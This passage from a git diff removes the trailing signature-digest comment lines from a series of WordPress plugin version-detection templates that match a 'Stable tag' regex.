4a0a004730450221009bd3a23ef2e9ff87b5993df8a89d21aa14b391d31d8cc3736c14067c7fe1ce8a02202abef744599ad73e7c12628ff801392477eb6d5c2f231092527c71e4050261f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 38c5ba0e87..540fbaf9ac 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100912b910bd2c879a6fa4309934a5c5122e2469721ee54827843425926fbf644a2022100eebc0e32a20b8818d965fbf00e9132ccad7a517c1da2d2fd2a1338c2830097c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 2e47a8ec5f..7e71b4736f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220106100c246ff17f932ebbdb84c2aef39e6cfee981910a619fc95737447cf63bd022100c9a6a537d8228df7de1d1af980ad2dae6ec04265cff77b241b3a44c9ae6faa0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 32b3b18110..88a70b2478 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c165fefad5efa423fa29cd598b548bff020f4428e035823148ac65c6b0b751cc022058fe7af98c6344ac957598dddb624f5c71d54bffcbd0aa8a9ed9eb151d4ff9ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 816b50845d..fc498e67e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207a743ea2789ff14c0a79d09245ec654f7f983c4f31c91bda13e0615efc4cacc1022100f5c21e3e1ae14bcf7a88e3c6d883d0f7a2cc061a88b4ee2c5b04c4fbc7af8132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 0b43f1bc78..465aa93d57 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e25e27e87d3a83148d4f8e30a6ab1d728dc92326e7abafd15264740483b8d496022047e27e96b03eb8ee98cb0b5f4155c0c378e00db459ed4f1a69ed92b59f632d48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 9d37ce6b1b..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220771206210070aacb3598d827c91d0fea9e6dff0666b79c898496e34e0182f97502201d32b5fb1e6a0dbb36acd5da85f9e286efa3238d593da8033f0a0dd35c91c4bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index a90d02b82e..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008c03b635d7c993204117dc7c873a0ae0c0686334bc81ba4502d129961748330b022100966b9c4d50b960959e8b3d7cefcebdd2f1b1803283401ec5e2506ef6d3b8a580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index cd3ecfbeff..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210089c4e7632ecdad7f4d092b72af79dbad16627c6ff917c022b207e2634f38b333022100d3853b4ea3cafc1bf591dd6b7d70374aee07c574dd96d8ab1ab32d16d275da26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 9a5a9d981c..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204b889ac74e8e9234b313df24f87a1230265fa8d546f801479b9b919b1b935d05022100bc679bbd0ad683b47b5e29a711b904a5208f7aa356e5df4a1f5bdcb811773a15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 6cb7b6e857..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022073947215a9181dede0627a6816069d7bfe83a70c816a567a17a4e68c9167a07202207336bf51f550d724c301d0745aab94d8ef3dd9f56ab97c689b7caf785d51f391:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index e49bea1ab9..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b6d329042151f56a92a09ca9f0fa32c3326cf18bdccb6f7ddb3d13ce56e6bee022008262053d04ba6a7dc0e545e39ef5d58a3a998daaa709b08887514b2fde9b447:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 897938757c..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204218286f0a25d396c91a17d481adcf8b6aaa9922beba5caf30850b1b41c70f6f02210084dbc6f8218f71e1f763cf13cc9469be6d2e4f61aef6a9144de6061668f799c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 962ee19127..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206f5fbccafa1f21f0d7f9ae0d1b7b6cadebf0e8b52c3eece1975244f3e20c9b66022100fa0f1e3ad629afd316ee8dd5d032c1ec1ac505a7d1310d37de4b65e02fa6282b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 869f84600c..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e7b743da77ebb8b5a13d4af133710f885409ae9f75aa7858b4a8ebfd02901cb2022100ebebb7358f4c1460504aa2b83355e2fdb79347a9a0eddf6c7b8a709c81a20f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index aa203efaef..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022079c2ffae21ea179ea5d8488b3c3800f8ee30deeee0126793463dccf379bc738802210081952f991d2ffc45a065f8c1df0c5f111fd7df3e67bedee25c2fa2e25534793f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 98dcef9a84..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022023ed1711d358dd4fdc649093253abc9ca46df5244bb7d696f04e0b3646d93fde02200d91dea11d977f6ffc5d49f1fa992354c1e15caf235a5031c1e0636d6b9f419b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 670574f365..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bcec64eed2022d5e6f987f2a4c781f7238d2b5c69cd080d2905aaa2fc322a50d0220475c1d6b13fdca4443ca4e205f4cddea66f8ff444318b8e122c43dac74db8999:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 8e10d000b3..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210099705b5e89887ef187d814b519687cc1e314048b70f3009f3898d4a7811090c2022054db2cce679d6093f237920192334c46a15a769d6c1026bab4bfef282bcc056d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index e6b2b44774..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022033c6f16011950f1f4e17b64f94a0fa8a8d1f478e241629a4c813f179f4cba76c022064a7135a02c34fdaf033a89337b40944ce60a0327b32d32813efa27e8f2a06ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index bab9b6bafb..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a27c8500735020a4c23726faa7af384bee4e95abd99816f873b84dd610d82f2022008960c8598fff08b620ef8c4b3f46f8d27c79152f2f38e25673c91b8fdbcb2e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 250acb9f75..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100beff0b48ce9fd1295bac4213935b69af24c1ed782aa567070774587f9b9a28cb022100d8a72c493042b9885cbead9e4ddfc45b155b076ddaa936ea8b109db46d693d66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 8d8592bbcf..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022015ffb61f5986f789dfb378eb6edd7c8318090118af17905aff977c4cc339e0a9022021708ce4edb9f4f7eee44ff39e34b023df13b75407beb30983e7ba10fc10b795:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 68eb2049c3..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b819282a70e2d618caede443a5873931241f88dc7df5a51843ec06895f4097f4022044a661096d6241b80a4b0ceb11a883982e6275b532b62e7204741ec41d0b86f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 910afed11a..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201834c3fcba0112176d13c3a0933524d62959fa1ac7fd720c997aa7b179cdce4a02205266d5aa97814c785f49331b702e11041bd4d4e5d763b8b4be78154b994b3377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 8a4554b10d..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202b49bb03379c2eecee1aec53e4119a9993616290241e50d78e4ed90c2b2b0d4f022100a159068cc56cbe04c388d12fb22c2477cf7860186a49f36a323e18c53c8e4588:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index e0559dd1bd..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203af97d34da63c2e3840447d983bfc36ec46a3d3c919d3e4eee1089dc6da475bb0220392e0597b347b2c9d474aa5226b8d2e3e2354f16f118377286e95f3ef134019e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 2ec6243f2d..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204ad8f355657fbcd18ef670fcd044c636e3a485c12b72ef4f55dc002c0d349e4b02204a20f5fb777dddd3c8fe0c59034584c9d72bf53b4fc2b4430bbee1bd4d849a22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 63d2ceb140..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022029572a4cd80a1ae1f3c3576c16f54257b2668ad21811b81b277f3e37f57dd5ac02204840f0078db5edddb0a7eda33af32a5a6ef25fb4e65d8a7d3218c841d44ef695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 669d663e1f..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220592736234fa04453f9ac49c44b4a0c3a41c2f93f03dab6860cdedb99a0760b0c022100f947d7ddd690a9c3272741f5b7373a161371f2aaeb753b134b1878a0b46c6b38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 22acd0f164..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fd04ba5e425e3dd6b5f92ebda6dea747deedafeead8d15f3402451fa8b757c6f02206de44240cb1399f1a0edee81b416f320288c1d0d9599ef690e905c39a87ed48b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 403182c7c6..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220608e417bbe57bb89132b934fc8d7771b2f1e3f46f3fa96a8962308c4e009556f022100c8e972ce4a8ac57d9425d0edc39a7e9b447a543c43ed3771321c0fc31b465048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index e4d37466b2..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dd3dc7e60841835abdffabfdc222b725d186872db93d7ab9c3e9db93773a4d26022100b473c9921a82468e5da144a36f8adcee74aa80493f1168bbd25b588c85b6efcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index bdd22e5868..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205f342f648b4c84f694571efa53242bd437d3185793bd65964d0163d9acd598f7022012bbcbadd2f0fc34b41d630461affeae7b8f40c64ac91cc429145851ecf24378:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index adea4c86a5..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206659ec6536d3fb6643281680b747bca6a5ef5fd03e9c59c62f7869e0e32aac9c02206733d91f1908a3c9c60c80ff9007ff3d055ba937b32e35002fd4e2c2c368db6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 2d4b1ec25a..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a3cc3c0dee59d0554feb2df8553927f0ccc58d5c1407aef6cdf29a812bd7526302207f7ea3b522b2db2df95c43292e613f06d1c2ed60a7b766d46b32c1cd415f3043:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 24613ab6a8..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e0f7c08c25f00d0da79e410cb67dc4824bd025b7f00cd842e679a1635bfff844022100d6365b48d485aac77bba7ab1c149a0d39bdcef43ff74e2d599770c7f5407b711:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 2d87605af1..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d57bdb9964f4c33fbad14dfceec3ee3ad3835d28d1b4108a107fef4715a548e5022100db960644f5693a981e5d8b76cc617baed3ac1868dd9c2fb1e28f7452a7e61844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 3661f78c8c..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203c8f08d7cf58eee422f688091c28fe3ecd35d782495f775b31baaa1f8f400f670220369ce822d854b1eaacc54c7d03db307c006bb33212780489275885e17bb4b841:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 1ce0e38df2..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e71ddf62210dd8b387705459c78afabaacd681f86cc06ac37d6155645c1c09e02204417df6361a659efba52f2879b18c85dacf9b46ddea50b5b707e9e282ccdaf71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 0462cc0edd..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022051f69d6ba11ea4eb7e51eff77e1f0e614427ad60e5ce8625db5b833a2bde7d4f022100bacb2ba6189f9afc2b3d3bd5612382514f4188f1c6eb59bd8d90b0434101a688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b926f83547..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aa37209dfb26f3b385f7f3dabb2b7d1eaab88001dc2ed71b5a2e04745c0efd870221009d7c48a24525a29393b23731cea72b49493c4fed95203670b98fe32647ed1a96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 22840625cc..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200ac40c966b6505666d0dcd3989028be6e5acc61b2ddfffa513c348b95f31476f022018cb8b57c15660390d78a14dbb94688b27ef504cdac59510de6b7686225294fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index b967aa79de..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220770ed1df62c323d7e06666b11299dde936d37d61651fb0b3f80db5d553933930022100ba1abeddc74d0563de5d4d388b2a36fdf9a380b659cf7a6aa9a6a8ef96c76c9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 2ac356a631..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c8c39ee0dbafe5dcd7f53b5234e702ffab9fb48c412aaf04f219b3e90ab79f92022100b9042d1017b3bfa511f1ad4cb2fec14c568409f9697bf32826dc74842a8d45de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 06dcf6d84d..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008b5082cf06964e01d5c2dfb31e7a99923cad1ebae851ec35dc9c387f5cebec41022100b5efc8c5c124bf2b326beae08076fcacb665a94191813cbb3dd3e04fd72670b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 109958a7b7..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207de3129b063aedf60e94221ebe84dde532e9f22a468a2e593a8d9afb61d3b80c022100aa6da8dfc95e82b64c59f46ec1fa08e0175831278258276596320fcc1b69a456:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 6a71d1da3f..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - 